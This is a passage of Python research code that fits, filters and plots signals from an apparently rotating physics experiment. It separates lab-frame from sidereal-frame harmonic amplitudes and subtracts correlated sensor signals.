res_obj=MF.orthogonal_multifit(t, sigRot.sig[:,h], yL,varyPhaseIndL, var=sigRot.err[:,h], minFreq=minFreq, maxFreq=maxFreq, bPlot=bPlot, bReturnFitObj=True)\r\n Nsensors=len(sigSensL)\r\n\r\n sensCoeffs=array(fitparams[:Nsensors])\r\n labCoeffs=array(fitparams[Nsensors:Nsensors+2])#-thetaRef\r\n labCov=cov[Nsensors:Nsensors+2, Nsensors:Nsensors+2]\r\n sidCoeffs=array(fitparams[Nsensors+2:Nsensors+4])#-thetaRef\r\n sidCov=cov[Nsensors+2:Nsensors+4, 
Nsensors+2:Nsensors+4]\r\n sidAmp=SiderealFitData(t=nanmean(t), sig=sidCoeffs, err=sidCov, \r\n chi2=adjchi2, \r\n labTheta=array([0,pi/2]),#0*nanmean(-sigRot.theta[:,0], axis=0) ,\r\n sidTheta=None,\r\n meta=None)\r\n labAmp=LabSetData(t=nanmean(t), sig=labCoeffs, err=labCov, chi2=None, labTheta=array([0.,pi/2]))\r\n #print(\"subtract fit params: {0}\".format(res_obj.params))\r\n\r\n\r\n # Convert data types down here\r\n #sigSubtracted=sig._replace(sig=(sig.sig.ravel()-sensCoeffs*array(sigSensL)).reshape(sig.sig.shape))\r\n\r\n return labAmp, sidAmp, None, res_obj\r\n\r\ndef subtract_correlations(sig, sigSensL, dontSubtract=[], scaleFact=None, minFreq=0.00005, maxFreq=None, bPlot=False):\r\n \"\"\" \r\n \"\"\"\r\n # Interpolate sigSensor to be the same as sig (if necessary))\r\n\r\n sigSensL=[interp(sig.t.ravel(), sigSens.t.ravel(), sigSens.sig.ravel()) for sigSens in sigSensL]\r\n\r\n sigSig=MT.naninterp(sig.sig.ravel())\r\n sigSensL=[MT.naninterp(sigSens) for sigSens in sigSensL]\r\n\r\n if minFreq is not None or maxFreq is not None: #Filter\r\n fs=1/median(diff(MT.nonnan(sig.t.ravel())))/(3600*24)\r\n if minFreq is not None and maxFreq is not None:\r\n sigFilt=MF.butter_bandpass_filter(sigSig, [minFreq, maxFreq], fs)\r\n sigSensL=[MF.butter_bandpass_filter(sigSens, [minFreq, maxFreq], fs) for sigSens in sigSensL]\r\n elif maxFreq is not None:\r\n sigFilt=MF.butter_lowpass_filter(sigSig, maxFreq, fs)\r\n sigSensL=[MF.butter_lowpass_filter(sigSens, maxFreq, fs) for sigSens in sigSensL]\r\n elif minFreq is not None:\r\n sigFilt=MF.butter_highpass_filter(sigSig, minFreq, fs)\r\n sigSensL=[MF.butter_highpass_filter(sigSens, minFreq, fs) for sigSens in sigSensL]\r\n else:\r\n sigFilt=sigSig\r\n #sigSensL=sigSensL\r\n\r\n # if @scaleFact is None, try to do a least-squares fit (or maybe something else in the longer-term)\r\n if scaleFact is None:\r\n t=MT.naninterp(sig.t.ravel())\r\n if hasattr(sig,'theta'):\r\n theta=sig.theta\r\n elif hasattr(sig, 'labTheta'):\r\n theta=sig.labTheta\r\n else:\r\n theta=None\r\n if theta is not None:\r\n theta=MT.naninterp(theta)\r\n dontSubtractD={ #Make these lambda functions so we won't evaluate them unless necessary\r\n 'lab_sinusoid': lambda: array((sin(theta), cos(theta))),\r\n 'sid_sinusoid': lambda: array((sin(2*pi*t+theta), cos(2*pi*t+theta)))\r\n }\r\n exog=array(sigSensL).T\r\n for st in dontSubtract: #Elements should either be functions (of t) or strings \r\n arr=dontSubtractD[st]()\r\n exog=hstack([exog,arr.T])\r\n endog=sigFilt\r\n exog=sm.add_constant(exog,prepend=False)\r\n model=sm.WLS(endog, exog, missing='drop') #(?)\r\n res=model.fit()\r\n scaleFact=array(res.params[:len(sigSensL)])\r\n print(\"subtract fit params: {0}\".format(res.params))\r\n\r\n\r\n sigSubtracted=sig._replace(sig=(sig.sig.ravel()-scaleFact*array(sigSensL)).reshape(sig.sig.shape))\r\n\r\n if bPlot or 1:\r\n figure()\r\n plot(t, sigFilt, '.')\r\n plot(t, exog, '.')\r\n plot(t, (scaleFact*array(sigSensL)).T)\r\n return sigSubtracted\r\n\r\ndef preprocess_raw(rawAmp, trigTimes, sigWindow):\r\n #vprint(\"using {0}\".format(sigWindow))\r\n indxL= sliceSorted(rawAmp.t, t_0=trigTimes + secs2sd(sigWindow.offset), delta_t=secs2sd(sigWindow.duration)) #indices of the points between each rotation\r\n #Now we 'regularize' it, making sure there's the same number of points in each slice (needed to make things faster later)\r\n NptsL=[ind.size for ind in indxL.ravel() if ind.size>1] #2 pts may be the minimum we can work with?\r\n\r\n minPtsI=argmin(NptsL)\r\n maxPts=max(NptsL)\r\n 
k=0;\r\n while NptsL[minPtsI]< 0.9*maxPts:\r\n vprint(\"A cut was too short: {0} vs {1}\".format(NptsL[minPtsI], maxPts)) \r\n NptsL.pop(minPtsI)\r\n minPtsI=argmin(NptsL)\r\n k+=1;\r\n if k>=20:\r\n print(\"Too mny short cuts. There's probably a segment of bad data\")\r\n #raise ValueError(\"Too mny short cuts. There's probably a segment of bad data\")\r\n minPts=NptsL[minPtsI]\r\n \r\n\r\n indxLReg=array([ind[:minPts] if ind.size>=minPts else -1*ones(minPts,dtype='i8') for ind in indxL.ravel()])\r\n \r\n indxLReg=indxLReg.reshape(indxL.shape[0], indxL.shape[1], minPts)\r\n\r\n rawAmpOut=RawData(t= rawAmp.t[indxLReg], sig=rawAmp.sig[indxLReg])\r\n rawAmpOut.sig[indxLReg==-1]=nan\r\n rawAmpOut.t[indxLReg==-1]=nan\r\n return rawAmpOut\r\n \r\ndef process_raw(rawAmp):\r\n def window_mean(arr, axis=0):\r\n win=windows.kaiser(arr.shape[axis], 10)\r\n win/=win.sum()\r\n #This isn't right\r\n return sum(arr*win[newaxis,newaxis,:],axis=axis)\r\n \r\n funcs_on_cutsL=[np.mean, lambda vals, **kwargs: np.std(vals, **kwargs)/sqrt(np.size(vals))]\r\n T=rawAmp.t.mean(axis=-1)\r\n Y=window_mean(rawAmp.sig, axis=-1) \r\n Err=np.std(rawAmp.sig,axis=-1)\r\n #Y, Err= processedL[0:]\r\n\r\n #rawSig=array([y[ind[:minPts]] if ind.size>=minPts else zeros(minPts)*nan for ind in indxL.ravel()])\r\n #rawSig=rawSig.reshape(indxL.shape[0], indxL.shape[1], minPts)\r\n #rawSigF=fft(rawSig)\r\n return PointData(t=T, sig=Y, err=Err,chi2=None,theta=None)\r\n\r\ndef process_points(ptLabAngle, pointAmp, cutAmp, stPtChi2Lim=50):\r\n \"\"\" Turn groups of points into sequences- except currently we go directly from a a group of 'cuts' (i.e. the cut-out raw data) to one value for each sequences.\r\n \"\"\"\r\n vprint(\"chi2 limit on string points: {}\".format(stPtChi2Lim))\r\n pointAmp=None\r\n ptT=mean(cutAmp.t, axis=-1)\r\n ptErr=std(cutAmp.sig, axis=-1)\r\n if ptLabAngle.shape[0] > cutAmp.sig.shape[0]:\r\n if ptLabAngle.shape[0]==cutAmp.sig.shape[0]+1:\r\n ptLabAngle=ptLabAngle[:-1]\r\n else:\r\n raise ValueError(\"angles shouldn't be more than 1 sequence bigger than the dataset (can happen if only part of a sequence is included). 
But here, ptLabAngle.shape[0] is {0} and cutAmp.shape[0] is {1}\".format(ptLabAngle.shape[0], cutAmp.sig.shape[0]))\r\n \r\n # Process each group of sequences\r\n outL=zip(*[mgStringHarmonics(th, seq, None, chi2Filter=inf) for th,seq, err in zip(ptLabAngle, cutAmp.sig, ptErr)])\r\n if stPtChi2Lim is not inf:\r\n #origSigA=array(outL[1])\r\n chi2temp=nanmean(array(outL[3]), axis =-1).squeeze()\r\n smoothedChi2=MT.running_nanmedian(chi2temp, 100)\r\n outL=zip(*[mgStringHarmonics(th, seq, None, chi2Filter=stPtChi2Lim*smChi2) for th,seq, err, smChi2 in zip(ptLabAngle, cutAmp.sig, ptErr, smoothedChi2)])\r\n labAngle, seqSig, seqErr, seqChi2 = [array(p) for p in outL] #Array-ify the results\r\n\r\n #Old stuff for doing harmonicsFit\r\n #th0s,h1,cov1=zip(*[getHarmonicsFit(th, seq, err) for th,seq, err in zip(theta[:-1], ptSig, ptErr )])\r\n #h1=array(h1)\r\n #cov1=array(cov1)\r\n #covAs=cov1[:,0].squeeze()\r\n #th0s=array(th0s)\r\n #chi2=None \r\n\r\n seqT=nanmean(ptT, axis=1)\r\n seqT=seqT[:,newaxis, newaxis]*ones(seqSig.shape) #make T's the same shape as the rest\r\n return CorrelationData(t=seqT, sig=seqSig, err=seqErr, chi2=seqChi2, theta=labAngle)\r\n\r\ndef filterBySensors(cutAmp, sensDataL=[], bView=True):\r\n #bView=True\r\n if not sensDataL:\r\n vprint(\"No sensor filtering\")\r\n return cutAmp\r\n\r\n Npts=cutAmp.sig.size/(cutAmp.sig.shape[-1])\r\n badM=zeros(Npts, dtype=bool) #Mask for 'bad' data\r\n if bView:\r\n fig, axL=subplots(len(sensDataL)+1, 1, sharex=True)\r\n #vprint(\"Filtering out bad points using sensors {0}\".format(sensorNameL))\r\n for k, sD in enumerate(sensDataL):\r\n #sDTs, [_, sDCutSig, sDCutErr], sDCutIndxL = sliceReduceData( sD[0], sD[1], trigTimes + secs2sd(sigWindow.offset), secs2sd(sigWindow.duration) ) \r\n badSDM, xSM=MT.findOutliers(sD.sig.ravel(), windowLen=70, sigmas=3, bReturnMeanLine=True)\r\n badM= badM | badSDM\r\n\r\n if bView:\r\n axL[k+1].plot(sD.t.ravel(), sD.sig.ravel(),'.')\r\n axL[k+1].plot(sD.t.ravel()[badSDM], sD.sig.ravel()[badSDM],'o')\r\n #axL[k+1].plot(sDTs.ravel()[badSDM], sDCutSig.ravel()[badSDM],'o')\r\n if bView:\r\n sigA=cutAmp.sig.mean(axis=-1)\r\n axL[0].plot(sD.t.ravel(), sigA.ravel(),'.')\r\n axL[0].plot(sD.t.ravel()[badM], sigA.ravel()[badM],'.') \r\n\r\n\r\n \r\n filtCutAmp=cutAmp._replace(sig=cutAmp.sig.copy())\r\n filtCutAmp.sig.reshape(-1,filtCutAmp.sig.shape[-1])[badM]=nan\r\n return filtCutAmp\r\n#def process_sequences(sT, sSig, sErr, sLabAngles):\r\ndef process_sequences(corrAmp):\r\n '''Process sequence values, sSig, into final numbers\r\n '''\r\n sT,sSig, sErr, sChi2, sLabAngles=[s[:,0,:] for s in corrAmp]\r\n if sSig.size==0:\r\n return None\r\n #sErr*sqrt(sChi2)\r\n #winI=20\r\n #chi2=nanmedian(corrAmp.chi2[I]*(corrAmp.Neff[I]./stats.chi2.ppf(0.5, corrAmp.Neff)), axis=0) \r\n #chisq1=nanmedian(v1(w,3,:).*(v1(w,4,:)./chi2inv(.5,v1(w,4,:))),1);\r\n #v1(j,2,:)=v1(j,2,:).*sqrt(chisq1);\r\n \r\n if not iterable(sLabAngles) or len(sLabAngles)==1 or unwrap(sLabAngles%pi).sum()<pi:#(maaaaaybeee)\r\n vprint(\"no lab angles given for sequence data in 'process_sequences'. 
Doing something dodgy that probably isn't right to make up for it\")\r\n if sSig:\r\n \r\n labSig= average(sSig, weights=sErr**2)\r\n else:\r\n labSig=[];labErr=[];labAngles=[]\r\n labAmp=LabSetData(t=mean(sT), sig=labSig, err=None, chi2=None, labTheta=squeeze(labAngles))\r\n else:\r\n if sErr.ndim>2:\r\n sErr=vstack([sErr[:,0,0], sErr[:,1,1]]).T\r\n [labAngles, labSignal, labErr, labChi2]=zip(*getHarmonicsFit(sLabAngles, sSig, sErr))[0] #This returns two angles, and we'll limit ourselves to the first harmonic\r\n labAmp=LabSetData(t=mean(sT)*ones(len(labAngles)),\r\n sig=array(labSignal), \r\n err=sqrt(diag(labErr)),\r\n chi2=labChi2,\r\n labTheta=array(labAngles))\r\n #labAmp=[array(labAmpTemp[0]), array(labAmpTemp[1]), sqrt(diag(labAmpTemp[2]))]\r\n ######SIDEREAL-FRAME FITTING##########\r\n #LV0=zip(*getHarmonicsFit(sT*2*pi, sSig, sErr))[0] #First harmonic only\r\n if sLabAngles is None:\r\n print(\"Not checked if it works when you don't give lab angles for sequences... we'll presume all measuremetns are taken in the same lab-orientation, but beware!\")\r\n [sidAngles, sidSignal, sidErr, sidChi2]=zip(*getHarmonicsFit(sT*2*pi, sSig, sErr))[0]\r\n else:\r\n [sidAngles, sidSignal, sidErr, sidChi2]=zip(*getHarmonicsFit(sT*2*pi + sLabAngles, sSig, sErr))[0]\r\n\r\n sidFitDat=SiderealFitData(t=mean(sT)*ones(len(labAngles)),\r\n #sig=array(sidSignal), err=sqrt(diag(sidErr)),\r\n sig=array(sidSignal), err=sidErr,\r\n labTheta=array(sidAngles), chi2=sidChi2, sidTheta=None, meta=None)\r\n #Repeat this for lab angles, and other sideral angles\r\n #sidAmp=[array(sidAmpTemp[0]), array(sidAmpTemp[1]), sqrt(diag(sidAmpTemp[2]))]\r\n return labAmp, sidFitDat\r\n\r\ndef process_continuous_raw(sigRaw, phaseRef, rotationRate, bPlot=False, th0FGz=2.87):\r\n #split up data\r\n\r\n #iterate through data\r\n #if phaseRef is a rawSig tuple (e.g. 
flux-gate), then fit it\r\n #else we'll assume it's time-theta pairs, in which case we'll also just interpolate \r\n\r\n #Fit the raw signal to a sin/cos pair plus some polynomial terms\r\n tOffs=sigRaw.t[0]\r\n #K=3600*24\r\n tSplit, sSplit = MT.splitAtGaps(sd2secs(sigRaw.t-tOffs), sigRaw.sig)\r\n tMedSplit, fgSplit = MT.splitAtGaps(sd2secs(phaseRef.t-tOffs), phaseRef.sig)\r\n gdInds=[~isnan(s) for s in sSplit]\r\n tSplit=[t[gdI] for t, gdI in zip(tSplit, gdInds)]\r\n sSplit=[s[gdI] for s, gdI in zip(sSplit, gdInds)]\r\n #plot(sig.t, MT.smooth(sig.sig,500, window='hanning'))\r\n\r\n fp4L=[]\r\n err4L=[]\r\n chi2L=[]\r\n tL=[]\r\n fgFitL=[]\r\n phaseL=[]\r\n thL=[]\r\n k=0\r\n for t, s, tfg, sfg in zip(tSplit, sSplit, tMedSplit, fgSplit):\r\n if t.size<2:\r\n continue\r\n midT=t[t.size/2]\r\n cutOffSecs=0\r\n t-=midT\r\n I=t.searchsorted(t[-1]-cutOffSecs)\r\n t=t[:I]\r\n s=s[:I]\r\n\r\n tfg-=midT\r\n I=tfg.searchsorted(tfg[-1]-cutOffSecs)\r\n tfg=tfg[:I]\r\n sfg=sfg[:I]\r\n\r\n try:\r\n p0=[ rotationRate, 0.03262361, 0.03052155, 5.41955202]\r\n gdI=~isnan(sfg)\r\n fFG=lambda t, f, a1, a2, offs: a1*sin(2*pi*f*t) + a2*cos(2*pi*f*t) + offs\r\n fpFG, err=curve_fit(fFG, tfg[gdI], sfg[gdI],p0=p0)\r\n fgFitL.append(fpFG)\r\n\r\n #figure()\r\n #plot(tfg,sfg)\r\n #plot(tfg, fFG(tfg, *fpFG))\r\n #figure()\r\n #plot(tfg, MT.smooth(sfg-fFG(tfg, *fpFG), 10))\r\n\r\n\r\n th0=arctan2(fpFG[1], fpFG[2]) # The angle where the fluxgate shows a minimum deviationF\r\n phaseL.append(th0)\r\n\r\n thfg=2*pi*fpFG[0]*tfg-th0%(2*pi)-2*pi\r\n #thfg=2*pi*(fpFG[0]-0.005)*tfg-th0%(2*pi)-2*pi\r\n th=interp(t, tfg,thfg)\r\n\r\n f4=lambda th, a1x, a1y, a2x, a2y, a3x,a3y, p1, p2, p3, p4, p5, offs: a1x*sin(th) + a1y*cos(th) + a2x*sin(2*th) + a2y*cos(2*th)+ a3x*sin(3*th) + a3y*cos(3*th)+ p1*th +p2*th**2 + p3*th**3 + p4*th**4 + p5*th**5 + offs\r\n\r\n p0=[0.1, 0.1, 1e-5, 1e-7, 1e-9, 0.08]\r\n\r\n sampleRate=1./median(diff(t))\r\n #print(\"Sample rate is {}\".format(sampleRate))\r\n Nds=round(sampleRate)\r\n\r\n p0=[0.1, 0.1, 0.1, 0.1, 0.1, 0.1, 1e-5, 1e-7, 1e-9, 1e-9, 1e-9, 0.08]\r\n th_ds, s_ds=MT.downsample_npts(th,Nds), MT.downsample_npts(s, Nds)\r\n if th_ds.size <= len(p0) +1:\r\n raise RuntimeError(\"not enough data here\")\r\n fp4, err4=curve_fit(f4, th_ds, s_ds, p0=p0)\r\n\r\n chi2= sum((f4(th, *fp4)-s)**2)/(th.size-len(p0))\r\n #fp, err=curve_fit(f, th,s,p0=p0)\r\n #fp2, err2=curve_fit(f2, th, s,p0=p0)\r\n #figure()\r\n #plot(t,MT.smooth(s,Nds, window='hanning'))\r\n #plot(t, f(th, *fp))\r\n #plot(t, f2(th, *fp2))\r\n #print(\"fp4: {0}\".format(fp4))\r\n fp4L.append(fp4)\r\n chi2L.append(chi2)\r\n #err4L.append(sqrt(diag(err4)))\r\n err4L.append(err4)\r\n tL.append(midT)\r\n thL.append(th)\r\n\r\n except RuntimeError:\r\n print(\"No fit at {}\".format(midT))\r\n\r\n\r\n fp4A=array(fp4L)\r\n fpA=fp4A[:,:2]\r\n fp2A=fp4A[:,2:4]\r\n fp3A=fp4A[:,4:6]\r\n err4A=array(err4L)\r\n errA=err4A[:,:2,:2]\r\n err2A=err4A[:,2:4,2:4]\r\n err3A=err4A[:,4:6,4:6]\r\n\r\n chi2A=array(chi2L)\r\n\r\n\r\n tA=array(tL)\r\n if bPlot:\r\n figure()\r\n errorbar(tA, fpA[:,0], errA[:,0],fmt='.')\r\n errorbar(tA, fpA[:,1], errA[:,1],fmt='.')\r\n title(\"1st harmonic\")\r\n figure()\r\n errorbar(tA, fp2A[:,0], err2A[:,0],fmt='.')\r\n errorbar(tA, fp2A[:,1], err2A[:,1],fmt='.')\r\n title('2nd Harmonic')\r\n\r\n figure()\r\n plot(tA, [p[0] for p in fgFitL])\r\n figure()\r\n plot(tA, [p[1] for p in fgFitL])\r\n plot(tA, [p[2] for p in fgFitL])\r\n figure()\r\n plot(tA, phaseL)\r\n N=tA.size\r\n tSeq=tile(secs2sd(tA)+tOffs, [2,2,1]).T\r\n 
sigSeq=hstack( [fpA[:,newaxis, :2], fp2A[:,newaxis,:2], fp3A[:,newaxis,:2]] )\r\n errSeq=hstack( [errA[:,newaxis, :2], err2A[:,newaxis,:2], err3A[:, newaxis,:2]] )\r\n #chi2Seq=hstack( [chi2_1A[:,newaxis], chi2_2A[:,newaxis]] )\r\n chi2Seq=hstack( [chi2A[:,newaxis], chi2A[:,newaxis], chi2A[:,newaxis]] )\r\n chi2Seq=dstack([chi2Seq, chi2Seq])\r\n sgn=-1 if rotationRate<0 else 1\r\n thetaSeq1=vstack( [zeros(N), zeros(N), zeros(N)])\r\n #thetaSeq2=vstack( [sgn*ones(N)*pi/2, sgn*ones(N)*pi/4, sgn*ones(N)*pi/6] )\r\n thetaSeq2=vstack( [sgn*ones(N)*pi/2, sgn*ones(N)*pi/2, sgn*ones(N)*pi/2] )\r\n #thetaSeq1=vstack( [zeros(N), ones(N)*pi/2])\r\n #thetaSeq2=vstack( [zeros(N), ones(N)*pi/4])\r\n\r\n #thetaSeq2=vstack( [ones(N)*pi/2, ones(N)*pi/4])\r\n thetaSeq=dstack([thetaSeq1.T, thetaSeq2.T])\r\n seqAmp=CorrelationData(\r\n t=tSeq.copy(),\r\n sig=sigSeq.copy(),\r\n err=errSeq.copy(),\r\n chi2=chi2Seq.copy(),\r\n theta=thetaSeq.copy() + th0FGz, #th0FGz is the orientation of the FGz correlation\r\n )\r\n return seqAmp\r\n\r\n\r\ndef split_and_process_sequences(seqAmp):\r\n seqT, seqSig, seqErr, seqChi2, labAngle=seqAmp\r\n def seqFiltAngle(seqAmp, th):\r\n mask=nearby_angles(seqAmp.theta[:,0,0], th, 0.1)\r\n return CorrelationData(*[s[mask] for s in seqAmp])\r\n seqAmp1=CorrelationData(seqAmp.t, *[d[:,0,0].squeeze() for d in seqAmp[1:]])\r\n seqAmp2=CorrelationData(seqAmp.t, *[d[:,0,1].squeeze() for d in seqAmp[1:]])\r\n\r\n\r\n\r\n thetaRef, xI, yI=group_by_axis(seqAmp1.theta) \r\n \r\n seqAmp1_0=CorrelationData(*[d[xI] for d in seqAmp1])\r\n seqAmp1_90=CorrelationData(*[d[yI] for d in seqAmp1])\r\n\r\n #seqAmp1_0=seqAmp1_0._replace(theta= seqAmp1_0.theta*sin(seqAmp1.theta[xI]-thetaRef))\r\n #seqAmp1_90=seqAmp1_90._replace(theta=seqAmp1_90.theta*cos(seqAmp1.theta[yI]-thetaRef))\r\n\r\n #seqSig1_0=seqSig1[xI]*sin(labAngle1[xI]-thetaRef)\r\n #seqErr1_0=seqErr1[xI]\r\n #seqSig1_90=seqSig1[yI]*cos(labAngle1[yI]-thetaRef)\r\n #seqErr1_90=seqErr1[yI]\r\n #seqT_0=seqT[xI]\r\n #seqT_90=seqT[yI]\r\n\r\n #seqAmp_0=CorrelationData([d[xI] for d in \r\n #seqAmp_0CorrelationData(t=seqT_0, sig=seqSig1_0, err=seqErr1_0, chi2=seqChi21[xI], labTheta=labAngle1[xI], None)\r\n\r\n seqAmpL=(seqAmp1_0, seqAmp1_90, seqAmp1)\r\n ampL=[ process_sequences(sAmp) for sAmp in seqAmpL ]\r\n\r\n #labAmp1_0, sidAmp1_0=process_sequences(seqAmp1_0)\r\n #labAmp1_90, sidAmp1_90=process_sequences(seqAmp1_90)\r\n #labAmp, sidAmp=process_sequences(seqAmp1)\r\n #labAmp0, sidAmp0=process_sequences(seqT_0, seqSig1_0, seqErr1_0, thetaRef)\r\n #labAmp90, sidAmp90=process_sequences(seqT_90, seqSig1_90, seqErr1_90, thetaRef+pi/2)\r\n #labAmp, sidAmp=process_sequences(seqT, seqSig1, seqErr1, labAngle1)\r\n\r\n #labAmpAlt= [labAmp0, labAmp90]\r\n #NS, EW=average([sidAmp0[1], sidAmp90[1][::-1]], axis=0, weights=[sidAmp[2]**2, sidAmp90[2][::-1]])\r\n #NS_err, EW_err = sqrt(sidAmp0[2]**2 + sidAmp90[2][::-1]**2)/2.\r\n #sidAmpAlt=[ (NS, EW), (NS_err, EW_err)] \r\n \r\n return zip(*ampL) + [seqAmpL] # --> (labAmps, sidAmps, seqAmps)\r\n #return [ (labAmp, labAmpAlt), (sidAmp, sidAmpAlt)]\r\n\r\ndef view_raw(rawAmp0, cutAmpL, trigTimes, cutAmpLNames=None, figName=None):\r\n if figName is not None:\r\n figDontReplace(figName + ' -raw')\r\n else:\r\n figDontReplace()\r\n gs=GridSpec(2,3)\r\n ax1=subplot(gs[0,:])\r\n ax2=subplot(gs[1,0])\r\n ax3=subplot(gs[1,1])\r\n ax4=subplot(gs[1,2])\r\n\r\n ax1.plot(rawAmp0.t, rawAmp0.sig)\r\n for cutAmp, name in zip(cutAmpL, cutAmpLNames):\r\n ax1.plot(cutAmp.t.ravel(), cutAmp.sig.ravel(), label=name, 
markersize=5)\r\n\r\n #ax1.vlines(trigTimes, rawAmp0.sig.min(), rawAmp0.sig.max(), linestyles='dotted')\r\n ax1.set_title('raw signal')\r\n ax1.set_xlabel('sd')\r\n ax1.legend()\r\n #cutAmp.sigF=fft(cutAmp.sig- nanmean(cutAmp.sig, axis=-1)[:,:,newaxis])\r\n cutAmpSigF, fax=MF.rPSD(cutAmp.sig- nanmean(cutAmp.sig, axis=-1)[:,:,newaxis], t=cutAmp.t[0][0])\r\n ax2.plot(fax/3600/24, nanmean(nanmean(abs(cutAmpSigF), axis=0), axis=0))\r\n ax2.set_title('PSD')\r\n ax2.set_xlabel('Hz')\r\n\r\n if 0:\r\n ax3.hist(nonnan(nanstd(cutAmp.sig, axis=-1).ravel()), bins=30)\r\n ax3.set_title('std')\r\n\r\n ttemp=cutAmp.t[0][0]\r\n slopes=[polyfit(ttemp, y, 1)[0] for y in cutAmp.sig.reshape(-1, cutAmp.sig.shape[-1]) if not all(isnan(y))]\r\n ax4.hist(nonnan(slopes), bins=30)\r\n ax4.set_title('slopes')\r\n\r\ndef view_correlation_filtering(pointAmpInit, correlationAmpInit, pointAmpFilt, correlationAmpFilt, figName=None, sharexAx=None):\r\n if figName is None:\r\n figDontReplace()\r\n else:\r\n figDontReplace(figName+' -Corr diff')\r\n gs=GridSpec(3,1)\r\n\r\n pointAxs=MT.plot_errorbar_and_hist(pointAmpInit.t.ravel(), pointAmpInit.sig.ravel(), pointAmpInit.err.ravel(), subplotSpec=gs[0], sharexs=[sharexAx,None])\r\n pointAxs=MT.plot_errorbar_and_hist(pointAmpFilt.t.ravel(), pointAmpFilt.sig.ravel(), \r\n pointAmpFilt.err.ravel(), *pointAxs\r\n )\r\n\r\n thetaRef, xI, yI=group_by_axis(correlationAmpInit.theta[:,0,:].ravel()) \r\n corAxs=MT.plot_errorbar_and_hist(correlationAmpInit.t.ravel()[xI], \r\n correlationAmpInit.sig.ravel()[xI]*sin(correlationAmpInit.theta.ravel()[xI]),\r\n correlationAmpInit.err.ravel()[xI], subplotSpec=gs[1], sharexs=[pointAxs[0], None]\r\n )\r\n MT.plot_errorbar_and_hist(correlationAmpInit.t.ravel()[yI], correlationAmpInit.sig.ravel()[yI]*cos(correlationAmpInit.theta.ravel()[yI]), correlationAmpInit.err.ravel()[yI], *corAxs)\r\n\r\n thetaRef, xI, yI=group_by_axis(correlationAmpFilt.theta[:,0,:].ravel()) \r\n corAxs=MT.plot_errorbar_and_hist(correlationAmpFilt.t.ravel()[xI], \r\n correlationAmpFilt.sig.ravel()[xI]*sin(correlationAmpFilt.theta.ravel()[xI]),\r\n correlationAmpFilt.err.ravel()[xI], *corAxs\r\n )\r\n MT.plot_errorbar_and_hist(correlationAmpFilt.t.ravel()[yI], correlationAmpFilt.sig.ravel()[yI]*cos(correlationAmpFilt.theta.ravel()[yI]), correlationAmpFilt.err.ravel()[yI], *corAxs)\r\n\r\n chi2Axs=MT.plot_scatter_and_hist(correlationAmpInit.t.ravel(), correlationAmpInit.chi2.ravel(), subplotSpec=gs[2], sharexs=[pointAxs[0],None], scatD={'c':'b'})\r\n chi2Axs=MT.plot_scatter_and_hist(correlationAmpFilt.t.ravel(), correlationAmpFilt.chi2.ravel(), *chi2Axs, scatD={'c':'g'})\r\n\r\ndef view_correlations(pointAmp, correlationAmp, figName=None, sharexAx=None, correlationSigComp=None ):\r\n if figName is None:\r\n figDontReplace()\r\n else:\r\n figDontReplace(figName+' -Corr')\r\n gs=GridSpec(3,1)\r\n gs=GridSpec(5,1)\r\n\r\n if correlationSigComp is not None and 1:\r\n #refNonNanM=~isnan(correlationSigComp)\r\n\r\n diffI=where( (correlationSigComp[:,0].ravel()!=correlationAmp.sig[:,0].ravel()) & (~isnan(correlationSigComp[:,0].ravel())))[0]\r\n #diffMask=correlationSigComp[refNonNanM]!=correlationAmp.sig[refNonNanM]\r\n\r\n #diffI=arange(correlationSigComp.size)[refNonNanM][diffMask.ravel()]\r\n #diffAmp[diffAmp==0]=nan\r\n #diffMask=~isnan(diffAmp.ravel())\r\n #pdb.set_trace()\r\n \r\n pointAxs=MT.plot_errorbar_and_hist(pointAmp.t.ravel(), pointAmp.sig.ravel(), pointAmp.err.ravel(), subplotSpec=gs[0], sharexs=[sharexAx,None])\r\n\r\n 
correlationAmp=rotate_sequence_amps(correlationAmp)\r\n thetaRef, xI, yI=group_by_axis(correlationAmp.theta[:,0,:].ravel()) \r\n err1h=sqrt(vstack([correlationAmp.err[:,0,0,0],correlationAmp.err[:,0,1,1]]).T)\r\n\r\n corAxs=MT.plot_errorbar_and_hist(correlationAmp.t[:,0].ravel()[xI], \r\n correlationAmp.sig[:,0].ravel()[xI]*cos(correlationAmp.theta[:,0].ravel()[xI]), \r\n err1h.ravel()[xI], \r\n subplotSpec=gs[1], sharexs=[pointAxs[0], None])\r\n MT.plot_errorbar_and_hist(correlationAmp.t[:,0].ravel()[yI], correlationAmp.sig[:,0].ravel()[yI]*sin(correlationAmp.theta[:,0].ravel()[yI]), err1h.ravel()[yI], *corAxs)\r\n\r\n #pdb.set_trace()\r\n if correlationSigComp is not None:\r\n #corAxs[0].plot(correlationAmp.t.ravel()[diffMask==xI], diffAmp.ravel()[diffMask==xI], 'rx')\r\n xdI=intersect1d(xI, diffI)\r\n ydI=intersect1d(yI, diffI)\r\n if xdI.size:\r\n corAxs[0].plot(correlationAmp.t[:,0].ravel()[xdI], correlationSigComp[:,0].ravel()[xdI]*cos(correlationAmp.theta[:,0].ravel()[xdI]), 'rx')\r\n #corAxs[0].plot(correlationAmp.t.ravel()[diffMask==yI], diffAmp.ravel()[diffMask==yI], 'yx')\r\n if ydI.size:\r\n corAxs[0].plot(correlationAmp.t[:,0].ravel()[ydI], correlationSigComp[:,0].ravel()[ydI]*sin(correlationAmp.theta[:,0].ravel()[ydI]), 'yx')\r\n\r\n\r\n ax=subplot(gs[2])\r\n #ax.plot(correlationAmp.t[:,0].ravel()[yI], correlationAmp.chi2[:,0].ravel()[yI],'o')\r\n #ax.plot(correlationAmp.t[:,0].ravel()[xI], correlationAmp.chi2[:,0].ravel()[xI],'o')\r\n chi21hAxs=MT.plot_scatter_and_hist(correlationAmp.t[:,0].ravel()[xI], correlationAmp.chi2[:,0].ravel()[xI], subplotSpec=gs[2])\r\n MT.plot_scatter_and_hist(correlationAmp.t[:,0].ravel()[yI], correlationAmp.chi2[:,0].ravel()[yI], *chi21hAxs)\r\n if correlationAmp.t.shape[1]>1: #2H\r\n err2h=sqrt(vstack([correlationAmp.err[:,1,0,0],correlationAmp.err[:,1,1,1]]).T)\r\n thetaRef, xI2, yI2=group_by_axis(2*correlationAmp.theta[:,1,:].ravel()) \r\n cor2hAxs=MT.plot_errorbar_and_hist(correlationAmp.t[:,1].ravel()[xI2], correlationAmp.sig[:,1].ravel()[xI2]*cos(2*correlationAmp.theta[:,1].ravel()[xI2]), err2h.ravel()[xI2], subplotSpec=gs[3], sharexs=[pointAxs[0], None])\r\n\r\n MT.plot_errorbar_and_hist(correlationAmp.t[:,1].ravel()[yI2], 